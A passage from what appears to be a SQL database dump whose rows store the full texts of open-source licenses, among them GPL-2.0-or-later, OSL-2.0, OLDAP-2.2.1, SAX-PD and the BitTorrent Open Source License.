alphabetical order, for\nthe convenience of the reader. The Section of this License in which each defined\nterm is first used is shown in parentheses.\n\nContributor: Each person or entity who created or contributed to the creation\nof, and distributed, a Modification. (See Section 2)\n\nDerivative Works: That term as used in this License is defined under U.S.\ncopyright law. (See Section 1(b))\n\nLicense: This BitTorrent Open Source License. (See first paragraph of License)\n\nLicensed Product: Any BitTorrent Product licensed pursuant to this License.\nThe term \"Licensed Product\" includes all previous Modifications from any Contributor\nthat you receive. (See first paragraph of License and Section 2)\n\n Licensor: BitTorrent, Inc. (See first paragraph of License)\n\nModifications: Any additions to or deletions from the substance or structure\nof (i) a file containing Licensed Product, or (ii) any new file that contains\nany part of Licensed Product. (See Section 2)\n\n Notice: The notice contained in Exhibit A. (See Section 4(e))\n\nSource Code: The preferred form for making modifications to the Licensed Product,\nincluding all modules contained therein, plus any associated interface definition\nfiles, scripts used to control compilation and installation of an executable\nprogram, or a list of differential comparisons against the Source Code of\nthe Licensed Product. (See\n\n Section 1(a))\n\n You: This term is defined in Section 14 of this License. EXHIBIT A\n\nThe Notice below must appear in each file of the Source Code of any copy you\ndistribute of the Licensed Product or any hereto. Contributors to any Modifications\nmay add their own copyright notices to identify their own contributions.\n\nLicense:\n\nThe contents of this file are subject to the BitTorrent Open Source License\nVersion 1.0 (the License). You may not copy or use this file, in either source\ncode or executable form, except in compliance with the License. You may obtain\na copy of the License at http://www.bittorrent.com/license/.\n\nSoftware distributed under the License is distributed on an AS IS basis, WITHOUT\nWARRANTY OF ANY KIND, either express or implied. See the License for the specific\nlanguage governing rights and limitations under the License.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(20,'GPL-2.0-or-later','GNU GENERAL PUBLIC LICENSE\n\nVersion 2, June 1991\n\nCopyright (C) 1989, 1991 Free Software Foundation, Inc. \n\n51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 , USA\n\nEveryone is permitted to copy and distribute verbatim copies of this license\ndocument, but changing it is not allowed.\n\nPreamble\n\nThe licenses for most software are designed to take away your freedom to share\nand change it. By contrast, the GNU General Public License is intended to\nguarantee your freedom to share and change free software--to make sure the\nsoftware is free for all its users. This General Public License applies to\nmost of the Free Software Foundation\'s software and to any other program whose\nauthors commit to using it. (Some other Free Software Foundation software\nis covered by the GNU Lesser General Public License instead.) You can apply\nit to your programs, too.\n\nWhen we speak of free software, we are referring to freedom, not price. Our\nGeneral Public Licenses are designed to make sure that you have the freedom\nto distribute copies of free software (and charge for this service if you\nwish), that you receive source code or can get it if you want it, that you\ncan change the software or use pieces of it in new free programs; and that\nyou know you can do these things.\n\nTo protect your rights, we need to make restrictions that forbid anyone to\ndeny you these rights or to ask you to surrender the rights. These restrictions\ntranslate to certain responsibilities for you if you distribute copies of\nthe software, or if you modify it.\n\nFor example, if you distribute copies of such a program, whether gratis or\nfor a fee, you must give the recipients all the rights that you have. You\nmust make sure that they, too, receive or can get the source code. And you\nmust show them these terms so they know their rights.\n\nWe protect your rights with two steps: (1) copyright the software, and (2)\noffer you this license which gives you legal permission to copy, distribute\nand/or modify the software.\n\nAlso, for each author\'s protection and ours, we want to make certain that\neveryone understands that there is no warranty for this free software. If\nthe software is modified by someone else and passed on, we want its recipients\nto know that what they have is not the original, so that any problems introduced\nby others will not reflect on the original authors\' reputations.\n\nFinally, any free program is threatened constantly by software patents. We\nwish to avoid the danger that redistributors of a free program will individually\nobtain patent licenses, in effect making the program proprietary. To prevent\nthis, we have made it clear that any patent must be licensed for everyone\'s\nfree use or not licensed at all.\n\nThe precise terms and conditions for copying, distribution and modification\nfollow.\n\nTERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION\n\n0. This License applies to any program or other work which contains a notice\nplaced by the copyright holder saying it may be distributed under the terms\nof this General Public License. The \"Program\", below, refers to any such program\nor work, and a \"work based on the Program\" means either the Program or any\nderivative work under copyright law: that is to say, a work containing the\nProgram or a portion of it, either verbatim or with modifications and/or translated\ninto another language. (Hereinafter, translation is included without limitation\nin the term \"modification\".) Each licensee is addressed as \"you\".\n\nActivities other than copying, distribution and modification are not covered\nby this License; they are outside its scope. The act of running the Program\nis not restricted, and the output from the Program is covered only if its\ncontents constitute a work based on the Program (independent of having been\nmade by running the Program). Whether that is true depends on what the Program\ndoes.\n\n1. You may copy and distribute verbatim copies of the Program\'s source code\nas you receive it, in any medium, provided that you conspicuously and appropriately\npublish on each copy an appropriate copyright notice and disclaimer of warranty;\nkeep intact all the notices that refer to this License and to the absence\nof any warranty; and give any other recipients of the Program a copy of this\nLicense along with the Program.\n\nYou may charge a fee for the physical act of transferring a copy, and you\nmay at your option offer warranty protection in exchange for a fee.\n\n2. You may modify your copy or copies of the Program or any portion of it,\nthus forming a work based on the Program, and copy and distribute such modifications\nor work under the terms of Section 1 above, provided that you also meet all\nof these conditions:\n\na) You must cause the modified files to carry prominent notices stating that\nyou changed the files and the date of any change.\n\nb) You must cause any work that you distribute or publish, that in whole or\nin part contains or is derived from the Program or any part thereof, to be\nlicensed as a whole at no charge to all third parties under the terms of this\nLicense.\n\nc) If the modified program normally reads commands interactively when run,\nyou must cause it, when started running for such interactive use in the most\nordinary way, to print or display an announcement including an appropriate\ncopyright notice and a notice that there is no warranty (or else, saying that\nyou provide a warranty) and that users may redistribute the program under\nthese conditions, and telling the user how to view a copy of this License.\n(Exception: if the Program itself is interactive but does not normally print\nsuch an announcement, your work based on the Program is not required to print\nan announcement.)\n\nThese requirements apply to the modified work as a whole. If identifiable\nsections of that work are not derived from the Program, and can be reasonably\nconsidered independent and separate works in themselves, then this License,\nand its terms, do not apply to those sections when you distribute them as\nseparate works. But when you distribute the same sections as part of a whole\nwhich is a work based on the Program, the distribution of the whole must be\non the terms of this License, whose permissions for other licensees extend\nto the entire whole, and thus to each and every part regardless of who wrote\nit.\n\nThus, it is not the intent of this section to claim rights or contest your\nrights to work written entirely by you; rather, the intent is to exercise\nthe right to control the distribution of derivative or collective works based\non the Program.\n\nIn addition, mere aggregation of another work not based on the Program with\nthe Program (or with a work based on the Program) on a volume of a storage\nor distribution medium does not bring the other work under the scope of this\nLicense.\n\n3. You may copy and distribute the Program (or a work based on it, under Section\n2) in object code or executable form under the terms of Sections 1 and 2 above\nprovided that you also do one of the following:\n\na) Accompany it with the complete corresponding machine-readable source code,\nwhich must be distributed under the terms of Sections 1 and 2 above on a medium\ncustomarily used for software interchange; or,\n\nb) Accompany it with a written offer, valid for at least three years, to give\nany third party, for a charge no more than your cost of physically performing\nsource distribution, a complete machine-readable copy of the corresponding\nsource code, to be distributed under the terms of Sections 1 and 2 above on\na medium customarily used for software interchange; or,\n\nc) Accompany it with the information you received as to the offer to distribute\ncorresponding source code. (This alternative is allowed only for noncommercial\ndistribution and only if you received the program in object code or executable\nform with such an offer, in accord with Subsection b above.)\n\nThe source code for a work means the preferred form of the work for making\nmodifications to it. For an executable work, complete source code means all\nthe source code for all modules it contains, plus any associated interface\ndefinition files, plus the scripts used to control compilation and installation\nof the executable. However, as a special exception, the source code distributed\nneed not include anything that is normally distributed (in either source or\nbinary form) with the major components (compiler, kernel, and so on) of the\noperating system on which the executable runs, unless that component itself\naccompanies the executable.\n\nIf distribution of executable or object code is made by offering access to\ncopy from a designated place, then offering equivalent access to copy the\nsource code from the same place counts as distribution of the source code,\neven though third parties are not compelled to copy the source along with\nthe object code.\n\n4. You may not copy, modify, sublicense, or distribute the Program except\nas expressly provided under this License. Any attempt otherwise to copy, modify,\nsublicense or distribute the Program is void, and will automatically terminate\nyour rights under this License. However, parties who have received copies,\nor rights, from you under this License will not have their licenses terminated\nso long as such parties remain in full compliance.\n\n5. You are not required to accept this License, since you have not signed\nit. However, nothing else grants you permission to modify or distribute the\nProgram or its derivative works. These actions are prohibited by law if you\ndo not accept this License. Therefore, by modifying or distributing the Program\n(or any work based on the Program), you indicate your acceptance of this License\nto do so, and all its terms and conditions for copying, distributing or modifying\nthe Program or works based on it.\n\n6. Each time you redistribute the Program (or any work based on the Program),\nthe recipient automatically receives a license from the original licensor\nto copy, distribute or modify the Program subject to these terms and conditions.\nYou may not impose any further restrictions on the recipients\' exercise of\nthe rights granted herein. You are not responsible for enforcing compliance\nby third parties to this License.\n\n7. If, as a consequence of a court judgment or allegation of patent infringement\nor for any other reason (not limited to patent issues), conditions are imposed\non you (whether by court order, agreement or otherwise) that contradict the\nconditions of this License, they do not excuse you from the conditions of\nthis License. If you cannot distribute so as to satisfy simultaneously your\nobligations under this License and any other pertinent obligations, then as\na consequence you may not distribute the Program at all. For example, if a\npatent license would not permit royalty-free redistribution of the Program\nby all those who receive copies directly or indirectly through you, then the\nonly way you could satisfy both it and this License would be to refrain entirely\nfrom distribution of the Program.\n\nIf any portion of this section is held invalid or unenforceable under any\nparticular circumstance, the balance of the section is intended to apply and\nthe section as a whole is intended to apply in other circumstances.\n\nIt is not the purpose of this section to induce you to infringe any patents\nor other property right claims or to contest validity of any such claims;\nthis section has the sole purpose of protecting the integrity of the free\nsoftware distribution system, which is implemented by public license practices.\nMany people have made generous contributions to the wide range of software\ndistributed through that system in reliance on consistent application of that\nsystem; it is up to the author/donor to decide if he or she is willing to\ndistribute software through any other system and a licensee cannot impose\nthat choice.\n\nThis section is intended to make thoroughly clear what is believed to be a\nconsequence of the rest of this License.\n\n8. If the distribution and/or use of the Program is restricted in certain\ncountries either by patents or by copyrighted interfaces, the original copyright\nholder who places the Program under this License may add an explicit geographical\ndistribution limitation excluding those countries, so that distribution is\npermitted only in or among countries not thus excluded. In such case, this\nLicense incorporates the limitation as if written in the body of this License.\n\n9. The Free Software Foundation may publish revised and/or new versions of\nthe General Public License from time to time. Such new versions will be similar\nin spirit to the present version, but may differ in detail to address new\nproblems or concerns.\n\nEach version is given a distinguishing version number. If the Program specifies\na version number of this License which applies to it and \"any later version\",\nyou have the option of following the terms and conditions either of that version\nor of any later version published by the Free Software Foundation. If the\nProgram does not specify a version number of this License, you may choose\nany version ever published by the Free Software Foundation.\n\n10. If you wish to incorporate parts of the Program into other free programs\nwhose distribution conditions are different, write to the author to ask for\npermission. For software which is copyrighted by the Free Software Foundation,\nwrite to the Free Software Foundation; we sometimes make exceptions for this.\nOur decision will be guided by the two goals of preserving the free status\nof all derivatives of our free software and of promoting the sharing and reuse\nof software generally.\n\n NO WARRANTY\n\n11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR\nTHE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE\nSTATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM\n\"AS IS\" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING,\nBUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\nFOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE\nOF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME\nTHE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.\n\n12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING\nWILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE\nTHE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY\nGENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE\nOR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA\nOR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES\nOR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH\nHOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\nEND OF TERMS AND CONDITIONS\n\nHow to Apply These Terms to Your New Programs\n\nIf you develop a new program, and you want it to be of the greatest possible\nuse to the public, the best way to achieve this is to make it free software\nwhich everyone can redistribute and change under these terms.\n\nTo do so, attach the following notices to the program. It is safest to attach\nthem to the start of each source file to most effectively convey the exclusion\nof warranty; and each file should have at least the \"copyright\" line and a\npointer to where the full notice is found.\n\n<one line to give the program\'s name and an idea of what it does.>\n\nCopyright (C) <yyyy> <name of author>\n\nThis program is free software; you can redistribute it and/or modify it under\nthe terms of the GNU General Public License as published by the Free Software\nFoundation; either version 2 of the License, or (at your option) any later\nversion.\n\nThis program is distributed in the hope that it will be useful, but WITHOUT\nANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\nFOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License along with\nthis program; if not, write to the Free Software Foundation, Inc., 51 Franklin\nStreet, Fifth Floor, Boston, MA 02110-1301 , USA.\n\nAlso add information on how to contact you by electronic and paper mail.\n\nIf the program is interactive, make it output a short notice like this when\nit starts in an interactive mode:\n\nGnomovision version 69, Copyright (C) year name of author Gnomovision comes\nwith ABSOLUTELY NO WARRANTY; for details type `show w\'. This is free software,\nand you are welcome to redistribute it under certain conditions; type `show\nc\' for details.\n\nThe hypothetical commands `show w\' and `show c\' should show the appropriate\nparts of the General Public License. Of course, the commands you use may be\ncalled something other than `show w\' and `show c\'; they could even be mouse-clicks\nor menu items--whatever suits your program.\n\nYou should also get your employer (if you work as a programmer) or your school,\nif any, to sign a \"copyright disclaimer\" for the program, if necessary. Here\nis a sample; alter the names:\n\nYoyodyne, Inc., hereby disclaims all copyright interest in the program `Gnomovision\'\n(which makes passes at compilers) written by James Hacker.\n\n< signature of Ty Coon > , 1 April 1989 Ty Coon, President of Vice This General\nPublic License does not permit incorporating your program into proprietary\nprograms. If your program is a subroutine library, you may consider it more\nuseful to permit linking proprietary applications with the library. If this\nis what you want to do, use the GNU Lesser General Public License instead\nof this License.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(21,'BSD-Source-Code','Copyright (c) 2011, Deusty, LLC\n\nAll rights reserved.\n\nRedistribution and use of this software in source and binary forms, with or\nwithout modification, are permitted provided that the following conditions\nare met:\n\n* Redistributions of source code must retain the above copyright notice, this\nlist of conditions and the following disclaimer.\n\n* Neither the name of Deusty nor the names of its contributors may be used\nto endorse or promote products derived from this software without specific\nprior written permission of Deusty, LLC.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\nLIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\nUSE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(22,'SAX-PD','Copyright Status\n\nSAX is free!\n\nIn fact, it\'s not possible to own a license to SAX, since it\'s been placed\nin the public domain.\n\nNo Warranty\n\nBecause SAX is released to the public domain, there is no warranty for the\ndesign or for the software implementation, to the extent permitted by applicable\nlaw. Except when otherwise stated in writing the copyright holders and/or\nother parties provide SAX \"as is\" without warranty of any kind, either expressed\nor implied, including, but not limited to, the implied warranties of merchantability\nand fitness for a particular purpose. The entire risk as to the quality and\nperformance of SAX is with you. Should SAX prove defective, you assume the\ncost of all necessary servicing, repair or correction.\n\nIn no event unless required by applicable law or agreed to in writing will\nany copyright holder, or any other party who may modify and/or redistribute\nSAX, be liable to you for damages, including any general, special, incidental\nor consequential damages arising out of the use or inability to use SAX (including\nbut not limited to loss of data or data being rendered inaccurate or losses\nsustained by you or third parties or a failure of the SAX to operate with\nany other programs), even if such holder or other party has been advised of\nthe possibility of such damages.\n\nCopyright Disclaimers\n\nThis page includes statements to that effect by David Megginson, who would\nhave been able to claim copyright for the original work.\n\nSAX 1.0\n\nVersion 1.0 of the Simple API for XML (SAX), created collectively by the membership\nof the XML-DEV mailing list, is hereby released into the public domain.\n\nNo one owns SAX: you may use it freely in both commercial and non-commercial\napplications, bundle it with your software distribution, include it on a CD-ROM,\nlist the source code in a book, mirror the documentation at your own web site,\nor use it in any other way you see fit.\n\nDavid Megginson, Megginson Technologies Ltd.\n\n1998-05-11\n\nSAX 2.0\n\nI hereby abandon any property rights to SAX 2.0 (the Simple API for XML),\nand release all of the SAX 2.0 source code, compiled code, and documentation\ncontained in this distribution into the Public Domain. SAX comes with NO WARRANTY\nor guarantee of fitness for any purpose.\n\nDavid Megginson, Megginson Technologies Ltd.\n\n2000-05-05\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(23,'OSL-2.0','The Open Software License v. 2.0\n\nThis Open Software License (the \"License\") applies to any original work of\nauthorship (the \"Original Work\") whose owner (the \"Licensor\") has placed the\nfollowing notice immediately following the copyright notice for the Original\nWork:\n\nLicensed under the Open Software License version 2.0\n\n1) Grant of Copyright License. Licensor hereby grants You a world-wide, royalty-free,\nnon-exclusive, perpetual, sublicenseable license to do the following:\n\n a) to reproduce the Original Work in copies;\n\nb) to prepare derivative works (\"Derivative Works\") based upon the Original\nWork;\n\nc) to distribute copies of the Original Work and Derivative Works to the public,\nwith the proviso that copies of Original Work or Derivative Works that You\ndistribute shall be licensed under the Open Software License;\n\n d) to perform the Original Work publicly; and\n\n e) to display the Original Work publicly.\n\n2) Grant of Patent License. Licensor hereby grants You a world-wide, royalty-free,\nnon-exclusive, perpetual, sublicenseable license, under patent claims owned\nor controlled by the Licensor that are embodied in the Original Work as furnished\nby the Licensor, to make, use, sell and offer for sale the Original Work and\nDerivative Works.\n\n3) Grant of Source Code License. The term \"Source Code\" means the preferred\nform of the Original Work for making modifications to it and all available\ndocumentation describing how to modify the Original Work. Licensor hereby\nagrees to provide a machine-readable copy of the Source Code of the Original\nWork along with each copy of the Original Work that Licensor distributes.\nLicensor reserves the right to satisfy this obligation by placing a machine-readable\ncopy of the Source Code in an information repository reasonably calculated\nto permit inexpensive and convenient access by You for as long as Licensor\ncontinues to distribute the Original Work, and by publishing the address of\nthat information repository in a notice immediately following the copyright\nnotice that applies to the Original Work.\n\n4) Exclusions From License Grant. Neither the names of Licensor, nor the names\nof any contributors to the Original Work, nor any of their trademarks or service\nmarks, may be used to endorse or promote products derived from this Original\nWork without express prior written permission of the Licensor. Nothing in\nthis License shall be deemed to grant any rights to trademarks, copyrights,\npatents, trade secrets or any other intellectual property of Licensor except\nas expressly stated herein. No patent license is granted to make, use, sell\nor offer to sell embodiments of any patent claims other than the licensed\nclaims defined in Section 2. No right is granted to the trademarks of Licensor\neven if such marks are included in the Original Work. Nothing in this License\nshall be interpreted to prohibit Licensor from licensing under different terms\nfrom this License any Original Work that Licensor otherwise would have a right\nto license.\n\n5) External Deployment. The term \"External Deployment\" means the use or distribution\nof the Original Work or Derivative Works in any way such that the Original\nWork or Derivative Works may be used by anyone other than You, whether the\nOriginal Work or Derivative Works are distributed to those persons or made\navailable as an application intended for use over a computer network. As an\nexpress condition for the grants of license hereunder, You agree that any\nExternal Deployment by You of a Derivative Work shall be deemed a distribution\nand shall be licensed to all under the terms of this License, as prescribed\nin section 1(c) herein.\n\n6) Attribution Rights. You must retain, in the Source Code of any Derivative\nWorks that You create, all copyright, patent or trademark notices from the\nSource Code of the Original Work, as well as any notices of licensing and\nany descriptive text identified therein as an \"Attribution Notice.\" You must\ncause the Source Code for any Derivative Works that You create to carry a\nprominent Attribution Notice reasonably calculated to inform recipients that\nYou have modified the Original Work.\n\n7) Warranty of Provenance and Disclaimer of Warranty. Licensor warrants that\nthe copyright in and to the Original Work and the patent rights granted herein\nby Licensor are owned by the Licensor or are sublicensed to You under the\nterms of this License with the permission of the contributor(s) of those copyrights\nand patent rights. Except as expressly stated in the immediately proceeding\nsentence, the Original Work is provided under this License on an \"AS IS\" BASIS\nand WITHOUT WARRANTY, either express or implied, including, without limitation,\nthe warranties of NON-INFRINGEMENT, MERCHANTABILITY or FITNESS FOR A PARTICULAR\nPURPOSE. THE ENTIRE RISK AS TO THE QUALITY OF THE ORIGINAL WORK IS WITH YOU.\nThis DISCLAIMER OF WARRANTY constitutes an essential part of this License.\nNo license to Original Work is granted hereunder except under this disclaimer.\n\n8) Limitation of Liability. Under no circumstances and under no legal theory,\nwhether in tort (including negligence), contract, or otherwise, shall the\nLicensor be liable to any person for any direct, indirect, special, incidental,\nor consequential damages of any character arising as a result of this License\nor the use of the Original Work including, without limitation, damages for\nloss of goodwill, work stoppage, computer failure or malfunction, or any and\nall other commercial damages or losses. This limitation of liability shall\nnot apply to liability for death or personal injury resulting from Licensor\'s\nnegligence to the extent applicable law prohibits such limitation. Some jurisdictions\ndo not allow the exclusion or limitation of incidental or consequential damages,\nso this exclusion and limitation may not apply to You.\n\n9) Acceptance and Termination. If You distribute copies of the Original Work\nor a Derivative Work, You must make a reasonable effort under the circumstances\nto obtain the express assent of recipients to the terms of this License. Nothing\nelse but this License (or another written agreement between Licensor and You)\ngrants You permission to create Derivative Works based upon the Original Work\nor to exercise any of the rights granted in Section 1 herein, and any attempt\nto do so except under the terms of this License (or another written agreement\nbetween Licensor and You) is expressly prohibited by U.S. copyright law, the\nequivalent laws of other countries, and by international treaty. Therefore,\nby exercising any of the rights granted to You in Section 1 herein, You indicate\nYour acceptance of this License and all of its terms and conditions. This\nLicense shall terminate immediately and you may no longer exercise any of\nthe rights granted to You by this License upon Your failure to honor the proviso\nin Section 1(c) herein.\n\n10) Termination for Patent Action. This License shall terminate automatically\nand You may no longer exercise any of the rights granted to You by this License\nas of the date You commence an action, including a cross-claim or counterclaim,\nfor patent infringement (i) against Licensor with respect to a patent applicable\nto software or (ii) against any entity with respect to a patent applicable\nto the Original Work (but excluding combinations of the Original Work with\nother software or hardware).\n\n11) Jurisdiction, Venue and Governing Law. Any action or suit relating to\nthis License may be brought only in the courts of a jurisdiction wherein the\nLicensor resides or in which Licensor conducts its primary business, and under\nthe laws of that jurisdiction excluding its conflict-of-law provisions. The\napplication of the United Nations Convention on Contracts for the International\nSale of Goods is expressly excluded. Any use of the Original Work outside\nthe scope of this License or after its termination shall be subject to the\nrequirements and penalties of the U.S. Copyright Act, 17 U.S.C. 101 et seq.,\nthe equivalent laws of other countries, and international treaty. This section\nshall survive the termination of this License.\n\n12) Attorneys Fees. In any action to enforce the terms of this License or\nseeking damages relating thereto, the prevailing party shall be entitled to\nrecover its costs and expenses, including, without limitation, reasonable\nattorneys\' fees and costs incurred in connection with such action, including\nany appeal of such action. This section shall survive the termination of this\nLicense.\n\n13) Miscellaneous. This License represents the complete agreement concerning\nthe subject matter hereof. If any provision of this License is held to be\nunenforceable, such provision shall be reformed only to the extent necessary\nto make it enforceable.\n\n14) Definition of \"You\" in This License. \"You\" throughout this License, whether\nin upper or lower case, means an individual or a legal entity exercising rights\nunder, and complying with all of the terms of, this License. For legal entities,\n\"You\" includes any entity that controls, is controlled by, or is under common\ncontrol with you. For purposes of this definition, \"control\" means (i) the\npower, direct or indirect, to cause the direction or management of such entity,\nwhether by contract or otherwise, or (ii) ownership of fifty percent (50%)\nor more of the outstanding shares, or (iii) beneficial ownership of such entity.\n\n15) Right to Use. You may use the Original Work in all ways not otherwise\nrestricted or conditioned by this License or by law, and Licensor promises\nnot to interfere with or be responsible for such uses by You.\n\nThis license is Copyright (C) 2003 Lawrence E. Rosen. All rights reserved.\nPermission is hereby granted to copy and distribute this license without modification.\nThis license may not be modified without the express written permission of\nits copyright owner.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(24,'MIT-advertising','Copyright (C) 2000-2008 Carsten Haitzler, Geoff Harrison and various contributors\nCopyright (C) 2004-2008 Kim Woelders\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is furnished\nto do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies of the Software, its documentation and marketing & publicity materials,\nand acknowledgment shall be given in the documentation, materials and software\npackages that this Software was used.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS\nBE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION\nOF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH\nTHE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(25,'OLDAP-2.2.1','The OpenLDAP Public License\n\nVersion 2.2.1, 1 March 2000\n\nRedistribution and use of this software and associated documentation (\"Software\"),\nwith or without modification, are permitted provided that the following conditions\nare met:\n\n1. Redistributions of source code must retain copyright statements and notices.\nRedistributions must also contain a copy of this document.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n3. The name \"OpenLDAP\" must not be used to endorse or promote products derived\nfrom this Software without prior written permission of the OpenLDAP Foundation.\n\n4. Products derived from this Software may not be called \"OpenLDAP\" nor may\n\"OpenLDAP\" appear in their names without prior written permission of the OpenLDAP\nFoundation.\n\n5. Due credit should be given to the OpenLDAP Project (http://www.openldap.org/).\n\n6. The OpenLDAP Foundation may revise this license from time to time. Each\nrevision is distinguished by a version number. You may use the Software under\nterms of this license revision or under the terms of any subsequent revision\nof the license.\n\nTHIS SOFTWARE IS PROVIDED BY THE OPENLDAP FOUNDATION AND CONTRIBUTORS ``AS\nIS\'\' AND ANY EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\nTHE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE OPENLDAP FOUNDATION OR ITS CONTRIBUTORS\nBE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\nUSE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nOpenLDAP is a trademark of the OpenLDAP Foundation.\n\nCopyright 1999-2000 The OpenLDAP Foundation, Redwood City, California, USA.\nAll Rights Reserved. Permission to copy and distributed verbatim copies of\nthis document is granted.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(26,'AFL-2.0','The Academic Free License\n\nv. 2.0 This Academic Free License (the \"License\") applies to any original\nwork of authorship (the \"Original Work\") whose owner (the \"Licensor\") has\nplaced the following notice immediately following the copyright notice for\nthe Original Work:\n\nLicensed under the Academic Free License version 2.0\n\n1) Grant of Copyright License. Licensor hereby grants You a world-wide, royalty-free,\nnon-exclusive, perpetual, sublicenseable license to do the following:\n\n a) to reproduce the Original Work in copies;\n\nb) to prepare derivative works (\"Derivative Works\") based upon the Original\nWork;\n\nc) to distribute copies of the Original Work and Derivative Works to the public;\n\n d) to perform the Original Work publicly; and\n\n e) to display the Original Work publicly.\n\n2) Grant of Patent License. Licensor hereby grants You a world-wide, royalty-free,\nnon-exclusive, perpetual, sublicenseable license, under patent claims owned\nor controlled by the Licensor that are embodied in the Original Work as furnished\nby the Licensor, to make, use, sell and offer for sale the Original Work and\nDerivative Works.\n\n3) Grant of Source Code License. The term \"Source Code\" means the preferred\nform of the Original Work for making modifications to it and all available\ndocumentation describing how to modify the Original Work. Licensor hereby\nagrees to provide a machine-readable copy of the Source Code of the Original\nWork along with each copy of the Original Work that Licensor distributes.\nLicensor reserves the right to satisfy this obligation by placing a machine-readable\ncopy of the Source Code in an information repository reasonably calculated\nto permit inexpensive and convenient access by You for as long as Licensor\ncontinues to distribute the Original Work, and by publishing the address of\nthat information repository in a notice immediately following the copyright\nnotice that applies to the Original Work.\n\n4) Exclusions From License Grant. Neither the names of Licensor, nor the names\nof any contributors to the Original Work, nor any of their trademarks or service\nmarks, may be used to endorse or promote products derived from this Original\nWork without express prior written permission of the Licensor. Nothing in\nthis License shall be deemed to grant any rights to trademarks, copyrights,\npatents, trade secrets or any other intellectual property of Licensor except\nas expressly stated herein. No patent license is granted to make, use, sell\nor offer to sell embodiments of any patent claims other than the licensed\nclaims defined in Section 2. No right is granted to the trademarks of Licensor\neven if such marks are included in the Original Work. 